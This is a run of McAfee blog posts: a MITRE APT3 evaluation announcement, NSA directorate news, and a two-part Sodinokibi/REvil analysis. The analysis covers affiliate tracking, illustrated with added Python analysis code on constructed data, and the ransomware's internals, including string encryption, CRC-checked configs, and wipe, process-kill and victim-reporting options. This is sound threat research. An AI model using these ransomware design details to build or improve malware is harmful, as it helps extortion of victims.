McAfee went through a MITRE ATT&CK assessment early this summer and we are excited to announce that MITRE has published the results of the APT3 assessment today on their website. In today’s cyber-threat landscape, it’s all about ‘time’: time to detect, time to respond, time to remediate, etc. When it comes to advanced attacks such as those represented in APT3, real-time detections offer incident responders a significant advantage in rapidly containing threats. 

As the results show, McAfee provided the most real-time alerts while detecting the attacks. When real-time alerts and the simple efficacy score, as calculated using criteria published by Josh Zelonis of Forrester, are considered together, McAfee occupies a leadership position in the upper-right quadrant of the chart: 

During MITRE’s APT3 evaluation, McAfee was the only vendor to display real-time alerts for certain attacks, including T1088: Bypass User Account Control, one of the techniques used by Shamoon. 

While MITRE’s evaluation focused on MVISION EDR’s detection capabilities, there are several aspects that defenders need to consider in order to properly triage, scope, contain and close an incident. During the APT3 attack we generated 200+ alerts and telemetry data points, which were the core of MITRE’s evaluation, yet we do not expect analysts to review them individually. In MVISION EDR those 200+ data points were clustered into 14 threats, which added context to paint a more complete picture of what happened and so speed up triage. 

Furthermore, analysts could trigger an automated investigation from a threat and thereby invoke our AI-driven investigation guides to bring in more context from other products (e.g. ePO, SIEM), endpoint forensics, analytics and threat intelligence.  

Investigation case collecting 4000+ pieces of evidence, linking it, showing expert findings and uncovering potential lateral movement between two devices 

Thanks to our automated investigation guides, in the case of APT3, MVISION EDR was able to gather passive DNS information and link the evidence to further expose potential lateral movement and C2. 

Although it was not exercised by MITRE, the next step for the analyst would have been to use MVISION EDR’s real-time search to further scope the affected devices and take containment actions (e.g. quarantine, killing processes). 

McAfee has been engaged with MITRE in expanding the ATT&CK Matrix and helping to evolve future ATT&CK Evaluations. We are a proud sponsor of ATT&CKcon and will be exhibiting at ATT&CKcon 2.0 later this month. Come and learn more about how automated, AI-driven investigations can reduce the time to detect and respond to threats using McAfee MVISION EDR. 

The post MITRE ATT&CK™ APT3 Assessment appeared first on McAfee Blogs.

America Launches New Cybersecurity Directorate

America's National Security Agency has launched a new organization to beef up the country's defenses against cyber-attackers. 

The Cybersecurity Directorate has been created to unify the efforts of the NSA's existing foreign intelligence and cyber-defense missions. The new organization will bring the Agency's threat detection, future-technologies, and cyber-defense personnel together under one roof for the very first time.

Underpinning the creation of the directorate is the idea that forming partnerships to allow intelligence and technical expertise to be pooled and operationalized represents America's best chance of thwarting cyber-adversaries. 

A spokesperson for the NSA said: "Many organizations work tirelessly to protect against today’s threats and tomorrow's risks, but the adversaries are tenacious, and they only need to be successful once.

"The Cybersecurity Directorate will reinvigorate NSA’s white hat mission by sharing critical threat information and collaborating with partners and customers to better equip them to defend against malicious cyber activity.

"The new directorate will also better position NSA to operationalize its threat intelligence, vulnerability assessments, and cyber-defense expertise by integrating these efforts to deliver prioritized outcomes." 

One of the NSA's partners is the Department of Homeland Security, with whom the Agency has been working to identify and monitor the systems in the financial sector that make the easiest hacking targets.

By launching the new directorate, the NSA hopes to strengthen the cyber-shield protecting the country's national security systems and critical infrastructure from threat actors. 

Topping the freshly launched organization's list of priorities are defending America's industrial base and innovating ways to improve the security of the nation's extensive arsenal of weapons. 

Helping to safeguard the private sector is also something that the new directorate will focus on. Efforts will be made to declassify threat intelligence received by the new organization as speedily as possible so that it can be shared with US businesses. 

NSA director General Paul Nakasone said: "What I’m trying to get to in a space like cyberspace is speed, agility, and unity of effort."

Leading the new Cybersecurity Directorate is director of cybersecurity Anne Neuberger, who reports directly to General Nakasone. Her previous positions include NSA’s first chief risk officer, deputy director of operations, and lead of NSA’s Russia Small Group. 

McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – The All-Stars

Episode 2: The All-Stars

Analyzing Affiliate Structures in Ransomware-as-a-Service Campaigns

This is the second installment of the McAfee Advanced Threat Research (ATR) analysis of Sodinokibi and its connections to GandCrab, the most prolific Ransomware-as-a-Service (RaaS) campaign of 2018 and mid-2019.

GandCrab announced its retirement at the end of May. Since then, a new RaaS family called Sodinokibi, aka REvil, has taken its place as one of the most prolific ransomware campaigns.

In episode one of our analysis of the Sodinokibi RaaS campaign we shared our extensive malware and post-infection analysis, which included code comparisons to GandCrab, and insight into exactly how massive the new Sodinokibi campaign is.

The Sodinokibi campaigns are still ongoing and differ in execution because different affiliates spread the ransomware. This raises further questions: how do the affiliates operate? Is the affiliate model working? What can we learn about the campaign, and about possible connections to GandCrab, by investigating the affiliates?

It turns out that, through large-scale sample analysis and aggregation of hardcoded values, we were able to determine which affiliates played a crucial role in the success of GandCrab’s criminal enterprise, and we found a lot of similarity between the RaaS enterprise of GandCrab and that of Sodinokibi.

Before we begin with the Sodinokibi analysis and comparison we will briefly explain the methodology that we used for GandCrab.

GandCrab RaaS System

GandCrab was a prime example of a Ransomware-as-a-Service. RaaS follows a structure where the developers are offering their product to affiliates, partners or advertisers who are responsible for spreading the ransomware and generating infections. The developers take a percentage of the earned income and provide the other portion to the affiliates.

FIGURE 1. HIGH LEVEL OVERVIEW OF THE GANDCRAB RAAS MODEL

Operating a RaaS model can be lucrative for both parties involved:

  • Developer’s perspective: The malware author(s) take a percentage of each payment for use of the ransomware product. This way the developers carry less risk than the affiliates spreading the malware. The developers can set certain targets for their affiliates regarding the number of infections they need to produce. In a way, this is very similar to a modern sales organization in the corporate world.

Additionally, a RaaS model offers malware authors a safe haven when they operate from a country that does not regard developing malware as a crime. If their own nation’s citizens are not victimized, the developers are not going to be prosecuted.

  • Affiliate perspective: As an affiliate you do not have to write the ransomware code yourself; less technical skill is involved. RaaS makes ransomware more accessible to a greater number of users. An affiliate just needs to be accepted in the criminal network and reach the targets set by the developers. As a service model it also offers a level of decentralization where each party sticks to their own area of expertise.

Getting a Piece of the Pie

Affiliates want to get paid proportionate to the infections they made; they expose themselves to a large amount of risk by spreading ransomware and they want to reap the benefits. Mutual trust between the developer and the affiliate plays a huge role in joining a RaaS system. It is very much like the expression: “Trust, hard to build, and easy to lose” and this largely explains the general skepticism that cybercriminal forum members display when a new RaaS system is announced.

For the RaaS service to grow and maintain that trust, proper administration of infections/earnings per affiliate plays an important part. Through this, the developers can ensure that everyone gets an honest piece of the proverbial “pie”. So how can this administration be achieved? One way is having hardcoded values in the ransomware.

Linking the Ransomware to Affiliates

Through our technical malware analysis, we established that, starting from version 4, GandCrab included certain hardcoded values in the ransomware source code:

  • id – The affiliate id number.
  • sub_id – The sub ID under the affiliate ID: a tracking number that lets the affiliate either sub-rent infections or track their own campaigns, each identifiable via its sub_id number.
  • version – The internal version number of the malware.

Version 4 had significant changes overall and we believe that these changes were partly done by the authors to improve administration and make GandCrab more scalable to cope with its increased popularity.

Based on the hardcoded values it was possible for us, to a certain extent, to extract the administration information and create our own overview. We hunted for as many different GandCrab samples as we could find, using Yara rules, industry contacts and customer submissions. The sample list we gathered is quite extensive but not exhaustive. From the collected samples we automatically extracted the hardcoded values and compile times using a custom-built tool. We aggregated all these values into one giant timeline from GandCrab version 4 all the way up to version 5.2.

FIGURE 2. SMALL PORTION OF THE TIMELINE OF COLLECTED SAMPLES (NOTE THE FIRST FOUR POSSIBLY TIME STOMPED)

ID and SUB_ID Characteristics Observed

Parent-Child Relationship
The extracted IDs and SUB_IDs showed a parent-child relationship, meaning every ID could have more than one SUB_ID (child) but every SUB_ID had only one ID (parent).

FIGURE 3. THE ACTIVITY OF ID NUMBER 41 (PARENT) AND ITS CORRESPONDING SUB_IDs (CHILDREN)

ID Increments
Overall, we observed a gradual increase in the ID number over time: the earlier versions generally had lower ID numbers, and higher ID numbers appeared with the later versions.

However, some relatively low ID numbers appeared across many versions, as shown in figure 3.

This observation aligned with our theory that the ID number corresponds with a particular affiliate. Certain affiliates remained partners for a long period of time, spreading different versions of GandCrab; this explains the ID number appearing over a longer period and in different versions. This theory has also been acknowledged by several (anonymous) sources.

Determining Top ID’s/Affiliates
When we applied the theory that the ID corresponds with an affiliate, we observed different levels of activity amongst the affiliates. Some affiliates/IDs were linked to only a single sample that we found. One explanation for an affiliate appearing only briefly is failure to perform: the GandCrab developers had a strict policy of expelling affiliates that underperformed, and expelling an affiliate would open a new slot that would receive a new, incremented ID number.

On the other hand, we observed several very active affiliates, “The All-Stars”, of which ID number 99 was by far the most active. We first observed ID 99 in six different samples of version 4.1.1, growing to 35 different samples in version 5.04. Based on our dataset we observed 71 unique unpacked samples linked to ID 99.

Being involved with several versions (consistency over time), in combination with the number of unique samples (volume) and the number of infections (based on industry malware detections) can effectively show which affiliate was the most aggressive and possibly the most important to the RaaS network.

Affiliate vs. Salesperson & Disruption

An active affiliate can be compared to a top salesperson in any normal commercial organization. Given that the income of the RaaS network is largely dependent on the performance of its top affiliates, identifying and disrupting a top affiliate’s activity can have a crippling effect on the income of the RaaS network, internal morale and overall RaaS performance. This can be achieved through arrests of an affiliate and/or co-conspirators.

Another way is disrupting the business model and lowering the ransomware’s profits through offering free decryption tools or building vaccines that prevent encryption. The disruption will increase the operational costs for the criminals, making the RaaS of less interest.

Lastly, for any future proceedings (suspect apprehension and legal) it is important to maintain a chain of custody linking victims, samples and affiliates together. Security providers as gatherers and owners of this data play a huge role in safeguarding this for the future.

Overview Versions and ID Numbers

Using an online tool from RAWGraphs we created a graphic display of the entire dataset showing the relationship between the versions and the ID numbers. Below is an overview; a more detailed version can be found on the McAfee ATR GitHub.

FIGURE 4. OVERVIEW OF GANDCRAB VERSIONS AND IDs

Top-performing affiliates immediately stood out from the rest, as their lines were thicker and more spread out. According to our data, the most active ID numbers were 15, 41, 99 and 170. Determining the key players in a RaaS family can help law enforcement prioritize its valuable resources.

Where are the All-Stars? Top Affiliates Missing in 5.2

We did not fully realize it at the time but, looking back at the overview, it stands out that none of the top affiliates/ID numbers were present in the final version 5.2 of GandCrab, which was released in February. We believe that this was an early indicator that the end of GandCrab was imminent.

This discovery might indicate that some kind of event had taken place that resulted in the most active affiliates not being present. The cause could have been internal or external.

But what puzzles us is why would a high performing affiliate leave? Maybe we will never hear the exact reason. Perhaps it is quite similar to why people leave regular jobs… feeling unhappy, a dispute or leaving for a better offer.

With the absence of the top affiliates the question remains: where did these affiliates go?

FIGURE 5. ID AND SUB_ID NUMBER LINKED TO VERSION 5.2

Please note that the active ID numbers 15, 41, 99 and 170 from the complete overview are not present in any GandCrab version 5.2 infections. The most active affiliate in version 5.2 was number 287.
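The parent-child grouping, the top-affiliate ranking, the "who is absent from a given version" check and the time-stomping note from figure 2 can all be run over one dataset of extracted values. The following is an added example and not McAfee ATR's own tool; it assumes that each sample has already been unpacked and its hardcoded id, sub_id, version and PE compile time pulled out. Every record below is constructed and the hashes are placeholders, and the multiplicative score in rank_affiliates is an assumption made for the example, since the text names the two factors (consistency and volume) but no formula.

```python
"""Affiliate administration analysis over values extracted from ransomware builds.

Added example, not McAfee ATR's tooling. Assumes id / sub_id / version and the
PE compile timestamp were already extracted from unpacked samples. All records
are constructed; the hashes are placeholders, not real samples.
"""
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class Sample:
    sha256: str          # placeholder, not a real hash
    version: str         # internal malware version string, e.g. "5.0.4"
    compiled: datetime   # PE compile timestamp
    affiliate_id: int    # hardcoded "id" (parent)
    sub_id: int          # hardcoded "sub_id" (child)


# Constructed dataset shaped like the timeline described in the text.
SAMPLES: List[Sample] = [
    Sample("sha256-placeholder-01", "4.1.1", datetime(2018, 7, 10), 99, 1),
    Sample("sha256-placeholder-02", "4.1.1", datetime(2018, 7, 12), 99, 2),
    Sample("sha256-placeholder-03", "4.3", datetime(2018, 8, 3), 99, 1),
    Sample("sha256-placeholder-04", "5.0.4", datetime(2018, 11, 1), 99, 3),
    Sample("sha256-placeholder-05", "5.0.4", datetime(2018, 11, 2), 99, 3),
    Sample("sha256-placeholder-06", "4.1.1", datetime(2018, 7, 11), 41, 1),
    Sample("sha256-placeholder-07", "5.1", datetime(2019, 1, 5), 41, 2),
    Sample("sha256-placeholder-08", "5.1", datetime(2019, 1, 6), 203, 1),
    Sample("sha256-placeholder-09", "5.2", datetime(2019, 2, 20), 287, 1),
    Sample("sha256-placeholder-10", "5.2", datetime(2019, 2, 21), 287, 2),
    Sample("sha256-placeholder-11", "5.2", datetime(2019, 2, 22), 301, 1),
    # A 5.1 build whose timestamp predates every 4.x build: possibly time-stomped.
    Sample("sha256-placeholder-12", "5.1", datetime(2017, 1, 1), 203, 2),
]


def parent_child_tree(samples: List[Sample]) -> Dict[int, Dict[int, List[str]]]:
    """Group samples as id -> sub_id -> [hashes] (the parent-child view of figure 3)."""
    tree: Dict[int, Dict[int, List[str]]] = defaultdict(lambda: defaultdict(list))
    for s in samples:
        tree[s.affiliate_id][s.sub_id].append(s.sha256)
    return {pid: dict(subs) for pid, subs in tree.items()}


def versions_per_affiliate(samples: List[Sample]) -> Dict[int, Set[str]]:
    """Versions each affiliate id was seen in: consistency over time."""
    seen: Dict[int, Set[str]] = defaultdict(set)
    for s in samples:
        seen[s.affiliate_id].add(s.version)
    return dict(seen)


def rank_affiliates(samples: List[Sample], top_n: int = 3) -> List[Tuple[int, int]]:
    """Rank ids by unique samples (volume) times versions seen (consistency).

    The multiplicative score is an assumption for this example; the text names
    the two factors but gives no formula.
    """
    volume = Counter(s.affiliate_id for s in samples)
    versions = versions_per_affiliate(samples)
    scored = {pid: volume[pid] * len(versions[pid]) for pid in volume}
    return sorted(scored.items(), key=lambda kv: (-kv[1], kv[0]))[:top_n]


def missing_in_version(samples: List[Sample], version: str, candidates: List[int]) -> List[int]:
    """Candidate ids that never appear in builds of `version` (the figure 5 check)."""
    present = {s.affiliate_id for s in samples if s.version == version}
    return sorted(set(candidates) - present)


def _version_key(version: str) -> Tuple[int, ...]:
    return tuple(int(part) for part in version.split("."))


def suspicious_timestamps(samples: List[Sample]) -> List[str]:
    """Flag samples compiled earlier than the earliest build of any lower version.

    Heuristic assumption: versions ship in increasing order, so a newer version
    carrying an older timestamp points at a stomped compile time.
    """
    earliest: Dict[Tuple[int, ...], datetime] = {}
    for s in samples:
        key = _version_key(s.version)
        earliest[key] = min(earliest.get(key, s.compiled), s.compiled)
    flagged = []
    for s in samples:
        key = _version_key(s.version)
        if any(s.compiled < t for lower, t in earliest.items() if lower < key):
            flagged.append(s.sha256)
    return flagged


if __name__ == "__main__":
    print("top affiliates:", rank_affiliates(SAMPLES))
    print("absent from 5.2:", missing_in_version(SAMPLES, "5.2", [15, 41, 99, 170]))
    print("possibly time-stomped:", suspicious_timestamps(SAMPLES))
```

On the constructed data, id 99 ranks first because it is both the highest-volume id and the one seen across the most versions, the four candidate ids are all reported absent from 5.2, and the one 5.1 build with a 2017 timestamp is flagged. Swap in real extracted values and the same functions reproduce the overview the text describes.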

Goodbye GandCrab, Hello Sodinokibi/REvil

In our opening episode we described the technical similarities we have seen between GandCrab and REvil. We are not the only ones that noticed these similarities – security reporter Brian Krebs published an article where he highlights the similarities between GandCrab and a new ransomware named Sodinokibi or REvil, and certain postings that were made on several underground forums.

Affiliates Switching RaaS Families….

On two popular underground forums a user named UNKN, aka Unknown, placed an advertisement on the 4th of July 2019 for a private ransomware-as-a-service (RaaS) he had been running for some time. Below is a screenshot of the posting. Of interest is the response from a user with the nickname Lalartu. In a reply to the advertisement, Lalartu mentions that he is working with UNKN and his team, and that they had been a former GandCrab affiliate, something that BleepingComputer noticed too. Lalartu’s post supports our earlier observation that some top GandCrab affiliates suddenly disappeared and might have moved to a different RaaS family. This had been suspected but never confirmed with technical evidence.

We suspect that Lalartu is not the only GandCrab affiliate that has moved to Sodinokibi. If top affiliates have a solid and very profitable infection method available, then it does not make sense to retire with the developers.

Around February 2019, there was a noticeable change in the behavior of some GandCrab infections. Managed Service Providers (MSPs) were now targeted through vulnerable systems and their customers were infected with GandCrab on a large scale, something we had not previously seen performed by any of the affiliates. Interestingly, shortly after the retirement of GandCrab, the MSP modus operandi was quickly adopted by Sodinokibi, another indication that a former GandCrab affiliate had moved to Sodinokibi.

This makes us suspect that Sodinokibi is actively recruiting the top performing affiliates from other successful RaaS families, creating a sort of all-star team.

At the same time, the RaaS market is such where less proficient affiliates can hone their skills, improve their spreading capabilities and pivot to the more successful RaaS families. Combined with a climate where relatively few ransomware arrests are taking place, it allows for an alarming cybercriminal career path with dire consequences.

Gathering “Administration” from Sodinokibi/REvil Samples

Another similarity Sodinokibi shares with GandCrab is the administration of infections, one of the indicators of a RaaS’s growth potential. In our earlier blog we discussed that Sodinokibi generates a JSON config file for each sample containing certain values such as a PID number and a value labeled sub. So, we decided to use our GandCrab affiliate methodology on the Sodinokibi config files we were able to collect.

With GandCrab we had to write our own tool to pull the hardcoded indicators but, with Sodinokibi, we were lucky enough that Carbon Black had developed a tool that did much of the heavy lifting for us. In the end there were still some samples from which we had to pull the configs manually. The JSON file contains different values and fields; for the comparison with GandCrab we focused on the PID and SUB fields of each sample, as these values appeared to have characteristics similar to the ID and SUB_ID fields in the GandCrab samples.

FIGURE 6. REVIL JSON CONFIG VALUES

Interpreting the Data Structures

With the data we gathered, we used the same analysis methodology on Sodinokibi as we did on GandCrab. We discovered that Sodinokibi has a RaaS structure very similar to GandCrab’s, with a nearly identical parent-child relationship structure. Below we compare the activity of GandCrab affiliate number 99 with that of Sodinokibi affiliate number 19.

FIGURE 7. THE ACTIVITY OF GANDCRAB ID NO 99 (PARENT) AND ITS CORRESPONDING SUB (CHILDREN)

FIGURE 8. THE ACTIVITY OF SODINOKIBI PID NO 19 (PARENT) AND ITS CORRESPONDING SUB (CHILDREN)

It needs to be said that the GandCrab overview was generated over a longer period of time and from a larger total of samples than the Sodinokibi overview.

Nevertheless, the similarity is quite striking.

The activity of both ID numbers displays a tree-shaped structure with the parent ID number at the root and branching out to the respective SUB numbers linked to multiple samples.

We believe that the activity above might be linked to a tiered affiliate group that is specialized in RDP brute forcing and infecting systems with Sodinokibi after each successful compromise.

Both RaaS family structures are too large to publish effectively within the space of this blog. Our complete overview of the Sodinokibi RaaS structure can be found on the McAfee GitHub.
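The Sodinokibi side of this comparison starts from extracted JSON configs rather than from hardcoded values, so the first step is normalising the pid/sub pair out of each config (and setting aside the samples whose config could not be parsed, the "pull it manually" cases mentioned above) before measuring the shape of one parent's branch against a GandCrab parent. The following is an added example, not McAfee ATR's or Carbon Black's tooling; every config string, record and hash is constructed, and the pids 19 and 99 are used only because the text compares those two branches.

```python
"""Normalising Sodinokibi configs and comparing parent/child branch shapes.

Added example, not McAfee ATR's or Carbon Black's tooling. Assumes the JSON
configs were already pulled out of unpacked samples; all configs, records and
hashes below are constructed placeholders.
"""
import json
from collections import defaultdict
from typing import Dict, List, Tuple

Record = Tuple[str, str, str]  # (parent, child, sample hash placeholder)

# Constructed decrypted Sodinokibi-style configs; two of them are damaged on purpose.
SODINOKIBI_CONFIGS: List[Tuple[str, str]] = [
    ("sha-s01", '{"pid":"19","sub":"1","net":true}'),
    ("sha-s02", '{"pid":"19","sub":"1","net":true}'),
    ("sha-s03", '{"pid":"19","sub":"2","net":false}'),
    ("sha-s04", '{"pid":"19","sub":"3"}'),
    ("sha-s05", '{"pid":"34","sub":"1"}'),
    ("sha-s06", "not a json config"),   # extraction failed: needs manual work
    ("sha-s07", '{"pid":"19"}'),        # sub field missing: needs manual work
]

# Constructed GandCrab records already in (id, sub_id, hash) form.
GANDCRAB_RECORDS: List[Record] = [
    ("99", "1", "sha-g01"), ("99", "1", "sha-g02"), ("99", "2", "sha-g03"),
    ("99", "3", "sha-g04"), ("41", "1", "sha-g05"),
]


def configs_to_records(configs: List[Tuple[str, str]]) -> Tuple[List[Record], List[str]]:
    """Map each config to (pid, sub, hash); return the hashes that need manual review."""
    records: List[Record] = []
    manual: List[str] = []
    for sha, raw in configs:
        try:
            cfg = json.loads(raw)
        except json.JSONDecodeError:
            manual.append(sha)
            continue
        pid, sub = cfg.get("pid"), cfg.get("sub")
        if pid is None or sub is None:
            manual.append(sha)
            continue
        records.append((str(pid), str(sub), sha))
    return records, manual


def children(records: List[Record], parent: str) -> Dict[str, List[str]]:
    """All child ids under one parent, each with the samples carrying that pair."""
    tree: Dict[str, List[str]] = defaultdict(list)
    for p, c, sha in records:
        if p == parent:
            tree[c].append(sha)
    return dict(tree)


def shape(records: List[Record], parent: str) -> Dict[str, int]:
    """Summarise one branch: number of children, total samples, widest child."""
    kids = children(records, parent)
    return {
        "children": len(kids),
        "samples": sum(len(v) for v in kids.values()),
        "max_per_child": max((len(v) for v in kids.values()), default=0),
    }


if __name__ == "__main__":
    recs, manual = configs_to_records(SODINOKIBI_CONFIGS)
    print("manual review:", manual)
    print("Sodinokibi pid 19:", shape(recs, "19"))
    print("GandCrab id 99:", shape(GANDCRAB_RECORDS, "99"))
```

Both branches come out with the same summary on the constructed data, which is the kind of side-by-side the figures above show; on real corpora the sample totals differ, as the text notes, so the comparison is about branching shape rather than absolute counts.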

Conclusion

When we started our journey with GandCrab we did not expect it would take us so far down the rabbit hole. Mass sample analysis and searching for administration indicators provided a way to get more insight into a multi-million-dollar criminal enterprise, determine key players and foresee future events through changes in the business structure. We believe that the retirement of GandCrab was not an overnight decision and, based on the data on the affiliates, it was clear that something was going to happen.

With the emergence of Sodinokibi and the few forum postings by a high profile former GandCrab affiliate, everything fell into place. We have strong indications that some of the top affiliates have found a new home with Sodinokibi to further their criminal business.

Given that the income of the RaaS network is largely dependent on the performance of its top affiliates, and it is run like a normal business, we (the security industry) should not only research the products the criminals develop, but also identify possible ways to successfully disrupt the criminal business.

In our next episode we dive deeper into the financial streams involved in the affiliate program and provide an estimate of how much money these actors are earning with the ransomware-as-a-service business model.

The post McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – The All-Stars appeared first on McAfee Blogs.

McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us

Episode 1: What the Code Tells Us

McAfee’s Advanced Threat Research team (ATR) observed a new ransomware family in the wild, dubbed Sodinokibi (or REvil), at the end of April 2019. Around this same time, the GandCrab ransomware crew announced they would shut down their operations. Coincidence? Or is there more to the story?

In this series of blogs, we share fresh analysis of Sodinokibi and its connections to GandCrab, with new insights gleaned exclusively from McAfee ATR’s in-depth and extensive research.

  • Episode 1: What the Code Tells Us
  • Episode 2: The All-Stars
  • Episode 3: Follow the Money
  • Episode 4: Crescendo

In this first instalment we share our extensive malware and post-infection analysis and visualize exactly how big the Sodinokibi campaign is.

Background

Since its arrival in April 2019, it has become very clear that the new kid in town, “Sodinokibi” or “REvil”, is a serious threat. The name Sodinokibi was discovered in the sample with hash ccfde149220e87e97198c23fb8115d5a, where ‘Sodinokibi.exe’ was mentioned as the internal file name; it is also known by the name REvil.

At first, Sodinokibi ransomware was observed propagating itself by exploiting a vulnerability in Oracle’s WebLogic server. However, similar to some other ransomware families, Sodinokibi is what we call a Ransomware-as-a-Service (RaaS), where a group of people maintain the code and another group, known as affiliates, spread the ransomware.

This model allows affiliates to distribute the ransomware any way they like. Some affiliates prefer mass-spread attacks using phishing campaigns and exploit kits, while other affiliates adopt a more targeted approach by brute-forcing RDP access and uploading tools and scripts to gain more rights and execute the ransomware in the internal network of a victim. We have investigated several campaigns spreading Sodinokibi, most of which had a different modus operandi, but we did notice that many started with a breach of an RDP server.

Who and Where is Sodinokibi Hitting?

Based on visibility from MVISION Insights we were able to generate the below picture of infections observed from May through August 23rd, 2019:

Who is the target? Mostly organizations, though it really depends on the skills and expertise from the different affiliate groups on who, and in which geo, they operate.

Reversing the Code

In this first episode, we will dig into the code and explain the inner workings of the ransomware once it has executed on the victim’s machine.

Overall the code is very well written and designed to execute quickly to encrypt the defined files in the configuration of the ransomware. The embedded configuration file has some interesting options which we will highlight further in this article.

Based on the code comparison analysis we conducted between GandCrab and Sodinokibi we consider it a likely hypothesis that the people behind the Sodinokibi ransomware may have some type of relationship with the GandCrab crew.

FIGURE 1.1. OVERVIEW OF SODINOKIBI’S EXECUTION FLOW

Inside the Code

Sodinokibi Overview

For this article we researched the sample with the following hash (packed):

The main goal of this malware, as other ransomware families, is to encrypt your files and then request a payment in return for a decryption tool from the authors or affiliates to decrypt them.

The malware sample we researched is a 32-bit binary, with an icon in the packed file and without one in the unpacked file. The packer is programmed in Visual C++ and the malware itself is written in pure assembly.

Technical Details

The goal of the packer is to decrypt the true malware part and use a RunPE technique to run it from memory. To obtain the malware from memory, we waited until decryption had finished and the payload was loaded into memory, then dumped it to obtain an unpacked version.

The first action of the malware is to resolve all functions needed at runtime and build a dynamic IAT, in order to hide the Windows API calls from static analysis.

FIGURE 2. THE MALWARE GETS ALL FUNCTIONS NEEDED IN RUNTIME

The next action of the malware is to try to create a mutex with a hardcoded name. It is important to know that the malware has 95% of its strings encrypted. Note that each sample of the malware has different strings in many places; values such as keys or seeds change all the time to frustrate what we, as an industry, do: making vaccines, or creating one decryptor that works without taking the values from the specific malware sample to decrypt the strings.

FIGURE 3. CREATION OF A MUTEX AND CHECK TO SEE IF IT ALREADY EXISTS

If the mutex exists, the malware finishes with a call to “ExitProcess.” This is done to avoid re-launching of the ransomware.

After this mutex operation the malware calculates a CRC32 hash of a part of its data, using a special seed that also changes per sample. This CRC32 implementation is based on the CRC32 polynomial operation rather than lookup tables, to make it faster and keep the code size smaller.

The next step is decrypting this block of data if the CRC32 check passes. If the check fails, the malware will skip this flow of code and try to use an exploit, as will be explained later in the report.

FIGURE 4. CALCULATION OF THE CRC32 HASH OF THE CRYPTED CONFIG AND DECRYPTION IF IT PASSES THE CHECK

If the malware passes the CRC32 check and decrypts the block correctly, with a key that changes per sample, the decrypted block is a JSON file in memory that will then be parsed. This config file has fields used later to prepare the keys that encrypt the victim key, plus more information that alters the behavior of the malware.

The CRC32 check prevents somebody from replacing the encrypted data with another config without also updating the CRC32 value stored in the malware.
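To make the two properties above concrete, the per-sample seed and the "swap the config and the check fails" behaviour, here is a table-free CRC32 written from the reflected polynomial, checked against zlib, and applied to a constructed config blob. This is an added example and not code from the sample or from McAfee ATR; the blob, the stored CRC and the seed value are all constructed for illustration.

```python
"""Bitwise (table-free) CRC32 and an integrity check over an embedded config blob.

Added example, not code from the sample or from McAfee ATR. The blob, the
stored CRC and the per-sample seed below are constructed for illustration.
"""
import zlib

CRC32_POLY = 0xEDB88320  # reflected form of the standard IEEE 802.3 polynomial


def crc32_bitwise(data: bytes, seed: int = 0xFFFFFFFF) -> int:
    """CRC32 computed bit by bit from the polynomial, with no 1 KiB lookup table.

    With the standard seed 0xFFFFFFFF this reproduces zlib.crc32(); any other
    seed yields a value that only a checker knowing that seed can reproduce.
    """
    crc = seed & 0xFFFFFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ CRC32_POLY if crc & 1 else crc >> 1
    return crc ^ 0xFFFFFFFF


def config_blob_is_intact(blob: bytes, stored_crc: int, seed: int) -> bool:
    """The check described above: recompute with the sample's seed and compare."""
    return crc32_bitwise(blob, seed) == stored_crc


# Constructed "encrypted config" blob and a constructed per-sample seed.
ENCRYPTED_CONFIG = bytes(range(64))
SAMPLE_SEED = 0x1337C0DE
# What a build would carry beside the blob: the CRC computed with its own seed.
STORED_CRC = crc32_bitwise(ENCRYPTED_CONFIG, SAMPLE_SEED)


def tamper_demo() -> dict:
    """Show why swapping in another config without updating the CRC fails the check."""
    swapped = bytearray(ENCRYPTED_CONFIG)
    swapped[10] ^= 0x01  # a single-bit change stands in for a replaced config
    return {
        # Standard seed reproduces the library result on the usual check string.
        "matches_zlib": crc32_bitwise(b"123456789") == zlib.crc32(b"123456789") & 0xFFFFFFFF,
        "original_ok": config_blob_is_intact(ENCRYPTED_CONFIG, STORED_CRC, SAMPLE_SEED),
        "tampered_ok": config_blob_is_intact(bytes(swapped), STORED_CRC, SAMPLE_SEED),
        # Verifying with the default seed fails as well: the seed must come from this sample.
        "default_seed_ok": config_blob_is_intact(ENCRYPTED_CONFIG, STORED_CRC, 0xFFFFFFFF),
    }


if __name__ == "__main__":
    print(tamper_demo())
```

The last entry in tamper_demo is the practical consequence for analysts: an extractor that recomputes the CRC to validate a dumped config has to recover the seed from the same sample, which is exactly the per-sample variation the text describes.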

After decrypting the JSON file, the malware parses it with a full JSON parser, extracts all fields and saves the values of these fields in memory.

FIGURE 5. PARTIAL EXAMPLE OF THE CONFIG DECRYPTED AND CLEANED

Let us explain all the fields in the config and their meanings:

  • pk -> This value encoded in base64 is important later for the crypto process; it is the public key of the attacker.
  • pid -> The affiliate number that belongs to the sample.
  • sub -> The subaccount or campaign id for this sample that the affiliate uses to keep track of its payments.
  • dbg -> Debug option. In the final version this is used to check if some things have been done or not; it is a development option that can be true or false. In the samples in the wild it is in the false state. If it is set, the keyboard check later will not happen. It is useful for the malware developers to prove the malware works correctly in the critical part without detecting his/her own machines based on the language.
  • fast -> If this option is enabled, and by default a lot of samples have it enabled, the malware will crypt the first 1 megabyte of each target file, or all files if it is smaller than this size. In the case that this field is false, it will crypt all files.
  • wipe -> If this option is ‘true’, the malware will destroy the target files in the folders that are described in the json field “wfld”. This destruction happens in all folders that have the name or names that appear in this field of the config in logic units and network shares. The overwriting of the files can be with trash data or null data, depending of the sample.
  • wht -> This field has some subfields: fld -> Folders that should not be crypted; they are whitelisted to avoid destroying critical files in the system and programs. fls -> List of whitelists of files per name; these files will never be crypted and this is useful to avoid destroying critical files in the system. ext -> List of the target extensions to avoid encrypting based on extension.
  • wfld -> A list of folders where the files will be destroyed if the wipe option is enabled.
  • prc -> List of processes to kill for unlocking files that are locked by this/these program/s, for example, “mysql.exe”.
  • dmn -> List of domains the malware will use, if the net option is enabled, to send information about the victim; this list can change per sample.
  • net -> This value can be false or true. By default it is usually true, meaning that the malware will send information about the victim, if the machine has Internet access, to the domains listed in the “dmn” field of the config.
  • nbody -> A big string encoded in base64 that is the template for the ransom note that will appear in each folder where the malware can create it.
